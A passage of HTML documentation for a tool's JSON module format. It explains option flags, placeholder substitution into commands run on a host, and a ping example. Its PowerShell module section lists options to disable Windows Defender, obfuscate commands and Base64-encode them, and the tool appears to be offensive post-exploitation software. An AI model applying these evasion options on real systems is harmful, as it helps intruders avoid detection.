<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;help&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;true&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-h&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Show help.&quot;</span><span class="p">}</span>
</pre></div>
</div>
<p>Some applications use a flag with no value after it. A common example of this <code class="docutils literal notranslate"><span class="pre">-h</span></code> to view an application’s help
information. A flag, WITHOUT its value can be accessed in the <code class="docutils literal notranslate"><span class="pre">commands</span></code> section with <code class="docutils literal notranslate"><span class="pre">.Flag</span></code>. For example
<code class="docutils literal notranslate"><span class="pre">{{help.Flag}}</span></code> would be parsed and replaced with just <code class="docutils literal notranslate"><span class="pre">-h</span></code>. If you want to only use the flag, and not its value, then
you must set its value to <code class="docutils literal notranslate"><span class="pre">true</span></code>. Using just the option’s name within double curly braces
will return both the flag and value. For example <code class="docutils literal notranslate"><span class="pre">{{help}}</span></code> would be parsed and replaced with <code class="docutils literal notranslate"><span class="pre">-h</span> <span class="pre">true</span></code>.</p>
</section>
</section>
<section id="commands">
<span id="id6"></span><h3>Commands<a class="headerlink" href="#commands" title="Permalink to this heading">¶</a></h3>
<p>The <code class="docutils literal notranslate"><span class="pre">commands</span></code> section of the module is used to provide the commands that are going to be executed on the host. The array should consist of every command in its own list item. You do not need to account for spaces. This is automatically done when the command is executed on the host.</p>
<p>You specify the location of an <cite>option</cite> by using double curly brace and the option’s <a class="reference internal" href="#name">name</a>. This will be parsed and replaced with both the <code class="docutils literal notranslate"><span class="pre">value</span></code> and <code class="docutils literal notranslate"><span class="pre">flag</span></code> values from the option’s list entry. The option’s <a class="reference internal" href="#flag">flag</a> and <a class="reference internal" href="#value">value</a> can be accessed individually. An example <code class="docutils literal notranslate"><span class="pre">command</span></code> section looks like:</p>
<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span>
<span class="w">    </span><span class="nt">&quot;options&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;host&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;google.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;The host to ping&quot;</span><span class="p">},</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;count&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;3&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-c&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Stop after sending count ECHO_REQUEST packets.&quot;</span><span class="p">},</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;help&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-h&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Show help.&quot;</span><span class="p">}</span>
<span class="w">    </span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;commands&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">      </span><span class="s2">&quot;/bin/ping&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{count}}&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{host.Value}}&quot;</span>
<span class="w">    </span><span class="p">]</span>
<span class="p">}</span>
</pre></div>
</div>
<p>This would get parsed as <code class="docutils literal notranslate"><span class="pre">/bin/ping</span> <span class="pre">-c</span> <span class="pre">3</span> <span class="pre">google.com</span></code></p>
<p>If an option’s value is not set, it will be ignored. An example of accessing only an option’s flag while ignoring everything else is:</p>
<div class="highlight-json notranslate"><div class="highlight"><pre><span></span><span class="p">{</span>
<span class="w">    </span><span class="nt">&quot;options&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;host&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;The host to ping&quot;</span><span class="p">},</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;count&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-c&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Stop after sending count ECHO_REQUEST packets.&quot;</span><span class="p">},</span>
<span class="w">        </span><span class="p">{</span><span class="nt">&quot;name&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;help&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;value&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;true&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;required&quot;</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;flag&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;-h&quot;</span><span class="p">,</span><span class="w"> </span><span class="nt">&quot;description&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;Show help.&quot;</span><span class="p">}</span>
<span class="w">    </span><span class="p">],</span>
<span class="w">    </span><span class="nt">&quot;commands&quot;</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w">      </span><span class="s2">&quot;/bin/ping&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{help.Flag}}&quot;</span>
<span class="w">      </span><span class="s2">&quot;{{count}}&quot;</span><span class="p">,</span>
<span class="w">      </span><span class="s2">&quot;{{host.Value}}&quot;</span>
<span class="w">    </span><span class="p">]</span>
<span class="p">}</span>
</pre></div>
</div>
<p>This would get parsed as <code class="docutils literal notranslate"><span class="pre">/bin/ping</span> <span class="pre">-h</span></code></p>
</section>
</section>
<section id="powershell">
<h2>Powershell<a class="headerlink" href="#powershell" title="Permalink to this heading">¶</a></h2>
<p>The <code class="docutils literal notranslate"><span class="pre">powershell</span></code> module is used to provide additional configuration options that pertain to PowerShell commands. Support for this module type is currently lacking. At this time is being used as placeholder for future development.</p>
<table class="docutils align-default" id="id9">
<caption><span class="caption-text">Module Base</span><a class="headerlink" href="#id9" title="Permalink to this table">¶</a></caption>
<thead>
<tr class="row-odd"><th class="head"><p>Name</p></th>
<th class="head"><p>Type</p></th>
<th class="head"><p>Description</p></th>
<th class="head"><p>Example</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p>disableav</p></td>
<td><p>bool</p></td>
<td><p>Should Windows Defender be disabled prior to running the command?</p></td>
<td><p>“disableav” : true</p></td>
</tr>
<tr class="row-odd"><td><p>obfuscate</p></td>
<td><p>bool</p></td>
<td><p>Should the PowerShell command be obfuscated?</p></td>
<td><p>“obfuscate”: false</p></td>
</tr>
<tr class="row-even"><td><p>base64</p></td>
<td><p>bool</p></td>
<td><p>Should the command be Base64 encoded?</p></td>
<td><p>“base64”: true</p></td>
</tr>
</tbody>
</table>
</section>
</section>


           </div>
           
          </div>
          <footer>
  
    <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation">
      
        <a href="../misc/blogs.html" class="btn btn-neutral float-right" title="Blog Posts" accesskey="n" rel="next">Next <span class="fa fa-arrow-circle-right"></span></a>
      
      
        <a href="../server/x509.html" class="btn btn-neutral float-left" title="TLS Certificates" accesskey="p" rel="prev"><span class="fa fa-arrow-circle-left"></span> Previous</a>
      
    </div>
  

  <hr/>

  <div role="contentinfo">
    <p>
        
        &copy; Copyright 2020, Russel Van Tuyl (@Ne0nd0g)

    </p>
  </div>
    
    
    
    Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a
    
    <a href="https://github.com/rtfd/sphinx_rtd_theme">theme</a>
    
    provided by <a href="https://readthedocs.org">Read the Docs</a>. 

</footer>

        </div>
      </div>

    </section>

  </div>
  

  <script type="text/javascript">
      jQuery(function () {
          SphinxRtdTheme.Navigation.enable(true);
      });
  </script>

  
  
    
   

</body>
</html>